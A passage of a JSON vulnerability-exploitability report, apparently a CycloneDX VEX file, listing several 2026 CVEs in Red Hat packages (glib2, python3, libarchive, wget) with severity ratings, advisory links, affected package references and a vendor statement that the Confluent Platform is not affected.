          "url": "https://avd.aquasec.com/nvd/cve-2026-1489"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1489"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1489"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433348"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-h6zf92f0298p.toml"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3872"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1489"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8017-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1489"
        }
      ],
      "published": "2026-01-27T15:15:57+00:00",
      "updated": "2026-06-17T10:15:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-1502",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "CR/LF bytes were not rejected by HTTP client proxy tunnel headers or host.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-1502"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/11/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-1502"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/05ed7ce7ae9e17c23a04085b2539fe6d6d3cef69"
        },
        {
          "url": "https://github.com/python/cpython/commit/56b7100b04e44ea27989242b176beb8f016b2c53"
        },
        {
          "url": "https://github.com/python/cpython/commit/58703ec1bdd1eb075e8b01a0c427683ce594dd3e"
        },
        {
          "url": "https://github.com/python/cpython/commit/9e071c9b28c17f347f81b388a003d4eeb3c7a8dd"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1cf9016335cb637c5a425032e8274a224f4b2ed"
        },
        {
          "url": "https://github.com/python/cpython/commit/c00c386faa579ad71196d33408644478488e43ec"
        },
        {
          "url": "https://github.com/python/cpython/issues/146211"
        },
        {
          "url": "https://github.com/python/cpython/pull/146212"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-1502.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/2IVPAEQWUJBCTQZEJEVTYCIKSMQPGRZ3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1502"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-1502"
        }
      ],
      "published": "2026-04-10T18:16:40+00:00",
      "updated": "2026-08-13T01:16:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15028",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        805,
        122
      ],
      "description": "A flaw was found in libarchive. This vulnerability allows a remote attacker to trigger a heap overflow by providing a specially crafted tar archive. The issue occurs during the parsing of a PAX extended header containing a malformed SUN.holesdata sparse-file attribute. Successful exploitation could lead to a denial of service, making the system unavailable, or potentially allow for arbitrary code execution, giving the attacker control over the affected system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15028"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:38279"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497970"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/3251"
        },
        {
          "url": "https://github.com/libarchive/libarchive/pull/3253"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15028"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8581-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15028"
        }
      ],
      "published": "2026-07-10T10:16:23+00:00",
      "updated": "2026-08-19T11:16:46+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-15146",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "GNU Wget does not validate the IP address provided by an FTP PASV response while operating in FTP passive mode. A malicious FTP server, or an HTTP server that redirects to an FTP URL, can exploit this behavior to redirect Wget\u2019s data connection to an arbitrary IP address and port. This allows an attacker to forge server-side requests (SSRF) from the machine running Wget, potentially accessing localhost services or internal network resources.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15146"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15146"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/wget.git/commit/?id=4f85853f641863d5915786a8413e1a213726a62b"
        },
        {
          "url": "https://kb.cert.org/vuls/id/564823"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15146"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8572-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-15146"
        },
        {
          "url": "https://www.kb.cert.org/vuls/id/564823"
        }
      ],
      "published": "2026-07-10T19:17:20+00:00",
      "updated": "2026-07-15T19:16:57+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "1.21.1-8.el9_4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-15588",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A denial-of-service and resource exhaustion vulnerability exists within the `GDBus` component of GLib. The `gdbusauth` authentication mechanism fails to enforce proper length limitations on data lines read from a client. An unauthenticated local or remote attacker can exploit this lack of input validation by sending excessively long streams of data, causing the application to consume massive amounts of system memory and CPU, potentially leading to a crash or system hang.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-15588"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:39985"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:40485"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42329"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55440"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-15588"
        },
        {
          "url": "https://bugzilla.redhat.com/2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/2499675"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492245"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492248"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492255"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492256"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2499675"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-15588"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58010"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58011"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58012"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-58013"
        },
        {
